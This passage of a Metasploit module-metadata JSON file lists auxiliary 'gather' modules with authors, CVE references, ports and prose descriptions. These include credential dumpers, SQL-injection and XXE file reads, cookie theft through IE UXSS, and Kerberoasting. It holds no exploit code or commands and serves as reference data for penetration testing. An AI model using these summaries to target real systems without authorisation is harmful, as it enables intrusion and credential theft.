"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/citrix_published_bruteforce.rb",
"is_install_path": true,
"ref_name": "gather/citrix_published_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/coldfusion_pwd_props": {
"name": "ColdFusion 'password.properties' Hash Extraction",
"full_name": "auxiliary/gather/coldfusion_pwd_props",
"rank": 300,
"disclosure_date": "2013-05-07",
"type": "auxiliary",
"author": [
"HTP",
"sinn3r <sinn3r@metasploit.com>",
"nebulus"
],
"description": "This module uses a directory traversal vulnerability to extract information\n such as password, rdspassword, and \"encrypted\" properties. This module has been\n tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the\n target ColdFusion version.",
"references": [
"CVE-2013-3336",
"OSVDB-93114",
"EDB-25305"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/coldfusion_pwd_props.rb",
"is_install_path": true,
"ref_name": "gather/coldfusion_pwd_props",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/corpwatch_lookup_id": {
"name": "CorpWatch Company ID Information Search",
"full_name": "auxiliary/gather/corpwatch_lookup_id",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module interfaces with the CorpWatch API to get publicly available\n info for a given CorpWatch ID of the company. If you don't know the\n CorpWatch ID, please use the corpwatch_lookup_name module first.",
"references": [
"URL-http://api.corpwatch.org/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb",
"is_install_path": true,
"ref_name": "gather/corpwatch_lookup_id",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/corpwatch_lookup_name": {
"name": "CorpWatch Company Name Information Search",
"full_name": "auxiliary/gather/corpwatch_lookup_name",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module interfaces with the CorpWatch API to get publicly available\n info for a given company name. Please note that by using CorpWatch API, you\n acknowledge the limitations of the data CorpWatch provides, and should always\n verify the information with the official SEC filings before taking any action.",
"references": [
"URL-http://api.corpwatch.org/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb",
"is_install_path": true,
"ref_name": "gather/corpwatch_lookup_name",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/d20pass": {
"name": "General Electric D20 Password Recovery",
"full_name": "auxiliary/gather/d20pass",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>"
],
"description": "The General Electric D20ME and possibly other units (D200?) feature\n TFTP readable configurations with plaintext passwords. This module\n retrieves the username, password, and authentication level list.",
"references": [
"CVE-2012-6663"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/d20pass.rb",
"is_install_path": true,
"ref_name": "gather/d20pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/darkcomet_filedownloader": {
"name": "DarkComet Server Remote File Download Exploit",
"full_name": "auxiliary/gather/darkcomet_filedownloader",
"rank": 300,
"disclosure_date": "2012-10-08",
"type": "auxiliary",
"author": [
"Shawn Denbow & Jesse Hertz",
"Jos Wetzels"
],
"description": "This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"URL-https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf",
"URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware"
],
"platform": "Windows",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/darkcomet_filedownloader.rb",
"is_install_path": true,
"ref_name": "gather/darkcomet_filedownloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/dolibarr_creds_sqli": {
"name": "Dolibarr Gather Credentials via SQL Injection",
"full_name": "auxiliary/gather/dolibarr_creds_sqli",
"rank": 300,
"disclosure_date": "2018-05-30",
"type": "auxiliary",
"author": [
"Issam Rabhi",
"Kevin Locati",
"Shelby Pace"
],
"description": "This module enables an authenticated user to collect the usernames and\n encrypted passwords of other users in the Dolibarr ERP/CRM via SQL\n injection.",
"references": [
"CVE-2018-10094",
"EDB-44805"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-19 22:15:14 +0000",
"path": "/modules/auxiliary/gather/dolibarr_creds_sqli.rb",
"is_install_path": true,
"ref_name": "gather/dolibarr_creds_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/doliwamp_traversal_creds": {
"name": "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
"full_name": "auxiliary/gather/doliwamp_traversal_creds",
"rank": 300,
"disclosure_date": "2014-01-12",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module will extract user credentials from DoliWamp - a WAMP\n packaged installer distribution for Dolibarr ERP on Windows - versions\n 3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session\n tokens in filenames in the 'tmp' directory. A directory traversal\n vulnerability in 'jqueryFileTree.php' allows unauthenticated users\n to retrieve session tokens by listing the contents of this directory.\n Note: All tokens expire after 30 minutes of inactivity by default.",
"references": [
"URL-https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144",
"URL-https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/doliwamp_traversal_creds.rb",
"is_install_path": true,
"ref_name": "gather/doliwamp_traversal_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/drupal_openid_xxe": {
"name": "Drupal OpenID External Entity Injection",
"full_name": "auxiliary/gather/drupal_openid_xxe",
"rank": 300,
"disclosure_date": "2012-10-17",
"type": "auxiliary",
"author": [
"Reginaldo Silva",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses an XML External Entity Injection\n vulnerability on the OpenID module from Drupal. The vulnerability exists\n in the parsing of a malformed XRDS file coming from a malicious OpenID\n endpoint. This module has been tested successfully on Drupal 7.15 and\n 7.2 with the OpenID module enabled.",
"references": [
"CVE-2012-4554",
"OSVDB-86429",
"BID-56103",
"URL-https://drupal.org/node/1815912",
"URL-http://drupalcode.org/project/drupal.git/commit/b912710",
"URL-http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/drupal_openid_xxe.rb",
"is_install_path": true,
"ref_name": "gather/drupal_openid_xxe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/eaton_nsm_creds": {
"name": "Network Shutdown Module sort_values Credential Dumper",
"full_name": "auxiliary/gather/eaton_nsm_creds",
"rank": 300,
"disclosure_date": "2012-06-26",
"type": "auxiliary",
"author": [
"h0ng10",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will extract user credentials from Network Shutdown Module\n versions 3.21 and earlier by exploiting a vulnerability found in\n lib/dbtools.inc, which uses unsanitized user input inside an eval() call.\n Please note that in order to extract credentials, the vulnerable service\n must have at least one USV module (an entry in the \"nodes\" table in\n mgedb.db).",
"references": [
"OSVDB-83199",
"URL-http://secunia.com/advisories/49103/"
],
"platform": "",
"arch": "",
"rport": 4679,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/gather/eaton_nsm_creds.rb",
"is_install_path": true,
"ref_name": "gather/eaton_nsm_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/emc_cta_xxe": {
"name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
"full_name": "auxiliary/gather/emc_cta_xxe",
"rank": 300,
"disclosure_date": "2014-03-31",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "EMC CTA v10.0 is susceptible to an unauthenticated XXE attack\n that allows an attacker to read arbitrary files from the file system\n with the permissions of the root user.",
"references": [
"CVE-2014-0644",
"EDB-32623"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/emc_cta_xxe.rb",
"is_install_path": true,
"ref_name": "gather/emc_cta_xxe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/enum_dns": {
"name": "DNS Record Scanner and Enumerator",
"full_name": "auxiliary/gather/enum_dns",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Nixawk"
],
"description": "This module can be used to gather information about a domain from a\n given DNS server by performing various DNS queries such as zone\n transfers, reverse lookups, SRV record brute forcing, and other techniques.",
"references": [
"CVE-1999-0532",
"OSVDB-492"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-15 15:38:56 +0000",
"path": "/modules/auxiliary/gather/enum_dns.rb",
"is_install_path": true,
"ref_name": "gather/enum_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/eventlog_cred_disclosure": {
"name": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure",
"full_name": "auxiliary/gather/eventlog_cred_disclosure",
"rank": 300,
"disclosure_date": "2014-11-05",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\n allow an unauthenticated user to obtain the superuser password of any managed Windows and\n AS/400 hosts. This module abuses both vulnerabilities to collect all the available\n usernames and passwords. First the agentHandler servlet is abused to get the hostid and\n slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames\n and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,\n the TARGETURI has to be prepended with /event.",
"references": [
"CVE-2014-6038",
"CVE-2014-6039",
"OSVDB-114342",
"OSVDB-114344",
"URL-https://seclists.org/fulldisclosure/2014/Nov/12"
],
"platform": "",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/eventlog_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/eventlog_cred_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/external_ip": {
"name": "Discover External IP via Ifconfig.me",
"full_name": "auxiliary/gather/external_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan"
],
"description": "This module checks for the public source IP address of the current\n route to the RHOST by querying the public web application at ifconfig.me.\n It should be noted this module will register activity on ifconfig.me,\n which is not affiliated with Metasploit.",
"references": [
"URL-http://ifconfig.me/ip"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/external_ip.rb",
"is_install_path": true,
"ref_name": "gather/external_ip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/f5_bigip_cookie_disclosure": {
"name": "F5 BigIP Backend Cookie Disclosure",
"full_name": "auxiliary/gather/f5_bigip_cookie_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thanat0s <thanspam@trollprod.org>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>",
"Denis Kolegov <dnkolegov@gmail.com>"
],
"description": "This module identifies F5 BigIP load balancers and leaks backend\n information (pool name, backend's IP address and port, routed domain)\n through cookies inserted by the BigIP system.",
"references": [
"URL-http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html",
"URL-http://support.f5.com/kb/en-us/solutions/public/7000/700/sol7784.html?sr=14607726"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/f5_bigip_cookie_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/firefox_pdfjs_file_theft": {
"name": "Firefox PDF.js Browser File Theft",
"full_name": "auxiliary/gather/firefox_pdfjs_file_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"fukusa",
"Unknown"
],
"description": "This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR\n 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability\n occurs in the PDF.js component, which uses JavaScript to render a PDF inside a frame with\n privileges to read local files. The in-the-wild malicious payloads searched for sensitive\n files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they\n do not use the Mozilla PDF viewer.",
"references": [
"URL-https://paste.debian.net/290146",
"URL-https://news.ycombinator.com/item?id=10021376",
"URL-https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/",
"CVE-2015-4495"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb",
"is_install_path": true,
"ref_name": "gather/firefox_pdfjs_file_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/flash_rosetta_jsonp_url_disclosure": {
"name": "Flash \"Rosetta\" JSONP GET/POST Response Disclosure",
"full_name": "auxiliary/gather/flash_rosetta_jsonp_url_disclosure",
"rank": 300,
"disclosure_date": "2014-07-08",
"type": "auxiliary",
"author": [
"Michele Spagnuolo",
"joev <joev@metasploit.com>"
],
"description": "A website that serves a JSONP endpoint that accepts a custom alphanumeric\n callback of 1200 chars can be abused to serve an encoded swf payload that\n steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.\n\n This module spins up a web server that, upon navigation from a user, attempts\n to abuse the specified JSONP endpoint URLs by stealing the response from\n GET requests to STEAL_URLS.",
"references": [
"CVE-2014-4671",
"URL-http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/",
"URL-https://github.com/mikispag/rosettaflash",
"URL-http://quaxio.com/jsonp_handcrafted_flash_files/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/flash_rosetta_jsonp_url_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/get_user_spns": {
"name": "Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)",
"full_name": "auxiliary/gather/get_user_spns",
"rank": 300,
"disclosure_date": "2014-09-27",
"type": "auxiliary",
"author": [
"Alberto Solino",
"Jacob Robles"
],
"description": "This module will try to find Service Principal Names that are associated with normal user accounts.\n Since normal accounts' passwords tend to be shorter than those of machine accounts, and knowing that a TGS request\n will encrypt the ticket with the account the SPN is running under, this could be used for an offline\n brute-forcing attack against the SPN account's NTLM hash if we can gather valid TGS tickets for those SPNs.\n This is part of the kerberoast attack research by Tim Medin (@timmedin).",
"references": [
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py",
"URL-https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/gather/get_user_spns.py",
"is_install_path": true,
"ref_name": "gather/get_user_spns",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"GetUserSPNs.py",
"Kerberoast"
]
}
},
"auxiliary_gather/hp_enum_perfd": {
"name": "HP Operations Manager Perfd Environment Scanner",
"full_name": "auxiliary/gather/hp_enum_perfd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module will enumerate the process list of a remote machine by abusing\n HP Operation Manager's unauthenticated 'perfd' daemon.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5227,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
"is_install_path": true,
"ref_name": "gather/hp_enum_perfd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/hp_snac_domain_creds": {
"name": "HP ProCurve SNAC Domain Controller Credential Dumper",
"full_name": "auxiliary/gather/hp_snac_domain_creds",
"rank": 300,
"disclosure_date": "2013-09-09",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will extract Domain Controller credentials from vulnerable installations of HP\n SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability\n has been used to exploit remote file uploads. This vulnerability can be used to gather important\n information handled by the vulnerable application, like plain text domain controller\n credentials. This module has been tested successfully with HP SNAC included with ProCurve\n Manager 4.0.",
"references": [
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/hp_snac_domain_creds.rb",
"is_install_path": true,
"ref_name": "gather/hp_snac_domain_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/http_pdf_authors": {
"name": "Gather PDF Authors",
"full_name": "auxiliary/gather/http_pdf_authors",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module downloads PDF documents and extracts the author's\n name from the document metadata.\n\n This module expects a URL to be provided using the URL option.\n Alternatively, multiple URLs can be provided by supplying the\n path to a file containing a list of URLs in the URL_LIST option.\n\n The URL_TYPE option is used to specify the type of URLs supplied.\n\n By specifying 'pdf' for the URL_TYPE, the module will treat\n the specified URL(s) as PDF documents. The module will\n download the documents and extract the authors' names from the\n document metadata.\n\n By specifying 'html' for the URL_TYPE, the module will treat\n the specified URL(s) as HTML pages. The module will scrape the\n pages for links to PDF documents, download the PDF documents,\n and extract the author's name from the document metadata.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/http_pdf_authors.rb",
"is_install_path": true,
"ref_name": "gather/http_pdf_authors",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/huawei_wifi_info": {
"name": "Huawei Datacard Information Disclosure Vulnerability",
"full_name": "auxiliary/gather/huawei_wifi_info",
"rank": 300,
"disclosure_date": "2013-11-11",
"type": "auxiliary",
"author": [
"Jimson K James",
"Tom James <tomsmaily@aczire.com>"
],
"description": "This module exploits an unauthenticated information disclosure vulnerability in Huawei\n SOHO routers. The module will gather information by accessing the /api pages where\n authentication is not required, allowing configuration changes as well as information\n disclosure, including any stored SMS.",
"references": [
"CWE-425",
"CVE-2013-6031",
"US-CERT-VU-341526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/huawei_wifi_info.rb",
"is_install_path": true,
"ref_name": "gather/huawei_wifi_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_bigfix_sites_packages_enum": {
"name": "IBM BigFix Relay Server Sites and Package Enum",
"full_name": "auxiliary/gather/ibm_bigfix_sites_packages_enum",
"rank": 300,
"disclosure_date": "2019-03-18",
"type": "auxiliary",
"author": [
"HD Moore",
"Chris Bellows",
"Ryan Hanson",
"Jacob Robles"
],
"description": "This module retrieves masthead, site, and available package information\n from IBM BigFix Relay Servers.",
"references": [
"CVE-2019-4061",
"URL-https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers"
],
"platform": "",
"arch": "",
"rport": 52311,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-19 12:53:27 +0000",
"path": "/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb",
"is_install_path": true,
"ref_name": "gather/ibm_bigfix_sites_packages_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_enumerate_users": {
"name": "IBM Lotus Notes Sametime User Enumeration",
"full_name": "auxiliary/gather/ibm_sametime_enumerate_users",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module extracts usernames using the IBM Lotus Notes Sametime web\n interface using either a dictionary attack (which is preferred), or a\n bruteforce attack trying all usernames of MAXDEPTH length or less.",
"references": [
"CVE-2013-3975",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_enumerate_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_room_brute": {
"name": "IBM Lotus Notes Sametime Room Name Bruteforce",
"full_name": "auxiliary/gather/ibm_sametime_room_brute",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module bruteforces Sametime meeting room names via the IBM\n Lotus Notes Sametime web interface.",
"references": [
"CVE-2013-3977",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_room_brute.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_room_brute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_version": {
"name": "IBM Lotus Sametime Version Enumeration",
"full_name": "auxiliary/gather/ibm_sametime_version",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module scans an IBM Lotus Sametime web interface to enumerate\n the application's version and configuration information.",
"references": [
"CVE-2013-3982",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_version.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_version",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ie_sandbox_findfiles": {
"name": "Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability",
"full_name": "auxiliary/gather/ie_sandbox_findfiles",
"rank": 300,
"disclosure_date": "2016-08-09",
"type": "auxiliary",
"author": [
"Yorick Koster"
],
"description": "It was found that Internet Explorer allows the disclosure of local file names.\n This issue exists due to the fact that Internet Explorer behaves differently for\n file:// URLs pointing to existing and non-existent files. When used in\n combination with HTML5 sandbox iframes it is possible to use this behavior to\n find out if a local file exists. This technique only works on Internet Explorer\n 10 & 11 since these support the HTML5 sandbox. Also it is not possible to do\n this from a regular website as file:// URLs are blocked altogether. The attack\n must be performed locally (works with Internet zone Mark of the Web) or from a\n share.",
"references": [
"CVE-2016-3321",
"MSB-MS16-095",
"URL-https://securify.nl/advisory/SFY20160301/internet_explorer_iframe_sandbox_local_file_name_disclosure_vulnerability.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ie_sandbox_findfiles.rb",
"is_install_path": true,
"ref_name": "gather/ie_sandbox_findfiles",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ie_uxss_injection": {
"name": "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
"full_name": "auxiliary/gather/ie_uxss_injection",
"rank": 300,
"disclosure_date": "2015-02-01",
"type": "auxiliary",
"author": [
"David Leo",
"filedescriptor",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet\n Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot\n have X-Frame-Options or it will fail). You can also have your own custom JavaScript\n by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if\n you are behind NAT.",
"references": [
"CVE-2015-0072",
"OSVDB-117876",
"MSB-MS15-018",
"URL-http://innerht.ml/blog/ie-uxss.html",
"URL-https://seclists.org/fulldisclosure/2015/Feb/10"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/ie_uxss_injection.rb",
"is_install_path": true,
"ref_name": "gather/ie_uxss_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/impersonate_ssl": {
"name": "HTTP SSL Certificate Impersonation",
"full_name": "auxiliary/gather/impersonate_ssl",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module requests a copy of the remote SSL certificate and creates a local\n (self-signed) version using the information from the remote version. The module\n then outputs (PEM|DER) format private key / certificate and a combined version\n for use in Apache or other Metasploit modules requiring SSLCert. Inputs for private\n key / CA cert have been provided for those with DigiNotar certs hanging about!",
"references": [
"URL-http://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/gather/impersonate_ssl.rb",
"is_install_path": true,
"ref_name": "gather/impersonate_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
